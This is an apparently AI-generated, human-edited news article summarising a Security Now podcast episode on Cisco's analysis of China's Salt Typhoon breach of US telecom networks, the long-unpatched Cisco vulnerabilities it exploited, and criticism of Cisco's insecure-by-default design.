The Salt Typhoon Disaster: How Cisco's Own Vulnerabilities Enabled China's Massive Telecom Breach
AI-created, human-edited.
In a sobering analysis on Security Now, cybersecurity expert Steve Gibson and host Leo Laporte dissected one of the most devastating network security breaches in recent history: China's Salt Typhoon operation. What they uncovered reveals a perfect storm of negligence, design flaws, and systemic failures that gave Chinese state-sponsored hackers unprecedented access to US telecommunications infrastructure.
Cisco's Talos Intelligence Group published a comprehensive postmortem titled "Weathering the Storm in the Midst of a Typhoon," analyzing how the Salt Typhoon threat actors systematically compromised major US telecommunications companies. The irony wasn't lost on Gibson that Cisco was reverse-engineering attacks that exploited their vulnerabilities.
The analysis revealed that Salt Typhoon maintained persistence in target environments for extended periods—in one case, over three years. These weren't simple hit-and-run attacks; they were sophisticated, long-term espionage operations using "living off the land" techniques on network devices.
Perhaps most shocking was the revelation that one of the primary attack vectors was CVE20180171, a Cisco vulnerability with a devastating CVSS score of 9.8. Gibson emphasized the absurdity: "The fact that a vulnerability Cisco fixed back in 2018 was successfully used by Salt Typhoon... in 2024, difficult to explain away. By 2024, the patch for a 2018 vulnerability would have been six years old."
This vulnerability had been sitting unpatched in critical telecommunications infrastructure for six years. As Gibson noted, "Web servers are certainly not permitted to be using any certificate that expired six years before, but critical networking gear is allowed to continue operating... with effectively expired firmware containing critical, known CVSS 9.8 scale vulnerabilities."
But the 2018 vulnerability wasn't even the worst one. Gibson revealed that CVE202320198 carried the extremely rare CVSS score of 10.0—literally as bad as it gets. This vulnerability was actually covered on Security Now episode 945 in October 2023, where Gibson warned about 42,000 exposed Cisco devices.
What happened next reads like a cybersecurity horror story. The number of vulnerable devices dropped rapidly, not because administrators were patching them, but because attackers like Salt Typhoon were scanning, compromising, and then closing the door behind them to prevent other hackers from getting in.
As Gibson put it: "The bad guys... scanned, located, immediately climbed inside and said thank you very much, see you later, and shut the door behind them."
The sophistication of the Salt Typhoon operation was staggering. According to Cisco's analysis, the attackers:
- Used stolen credentials to expand their access
- Exfiltrated device configurations via TFTP and FTP
- Captured SNMP, TACACS, and RADIUS traffic, including secret keys
- Modified running configurations to create persistent backdoors
- Set up GRE tunnels for encrypted data exfiltration
- Created unexpected local accounts and modified access control lists
- Started SSH servers on high ports for persistent access
- Installed packet capture capabilities to monitor network traffic
Gibson highlighted the terrifying capability that modern Cisco devices gave attackers: "The operating systems of these Cisco devices support the installation of a tap into network interfaces, which then monitors, captures, and exports the intercepted network traffic to any external FTP server."
Both Gibson and Laporte emphasized that this disaster represents a fundamental flaw in how network infrastructure is maintained. Gibson called the current model "fundamentally broken," explaining that it creates a brittle chain requiring perfect performance from everyone involved.
"Technicians in the field are always going to appear to have better things to do than to continually run around updating the operating versions of the firmware of every device," Gibson observed. This creates natural pressure to "set it and forget it," leaving devices vulnerable to newly discovered flaws.
Gibson reserved particular criticism for Cisco's design decisions, especially regarding web management interfaces. He pointed out that 42,000 Cisco devices were globally accessible when the 2023 vulnerability was exploited, asking: "Who would ever need to allow China to access your device's management interface?"
The existence of Cisco's "hardening guide" particularly irked Gibson: "The fact that there's a hardening guide suggests that even today, Cisco still doesn't get it... A device's security ought to be difficult and require deliberate work to make any such device insecure."
He argued that securebydefault design should make it impossible to accidentally expose management interfaces globally, rather than relying on optional hardening guides that many administrators never implement.
The implications extend far beyond telecommunications companies. As Gibson noted, Salt Typhoon didn't just target telecom providers—they compromised ISPs and even Digital Realty, one of the largest cloud providers. The 42,000 initially compromised devices represent a massive attack surface that may never be fully cleaned.
"Given everything we know of the way today's networks are being managed, that's not a bet I would take," Gibson said when asked whether all instances of the intrusion have been found and removed.
The Salt Typhoon analysis serves as a damning indictment of current network security practices. Both hosts emphasized that this isn't just about patching—it's about fundamental design philosophy and responsibility.
Gibson drew a sharp distinction between mistakes and policies: "Mistakes happen, but policies are deliberate." In this case, Cisco's policy of allowing global access to management interfaces created the conditions for catastrophic compromise.
As Laporte pointed out, the real tragedy is that the damage isn't limited to the organizations that bought and deployed vulnerable Cisco equipment—it extends to all their customers and users. When a telecom provider is compromised, everyone who relies on their services becomes a potential victim.
The Salt Typhoon operation represents what Gibson called the moment when "the US's networks have fallen to Chinese military"—not through some dramatic cyberwar scenario, but through the mundane accumulation of unpatched vulnerabilities and poor security practices.
This analysis from Security Now serves as both a technical postmortem and a wake-up call for the entire networking industry. As critical infrastructure becomes increasingly software-defined and powerful, the consequences of "set and forget" maintenance practices become national security issues.
The question isn't whether we'll see another Salt Typhoon—it's whether we'll learn from this one before it's too late.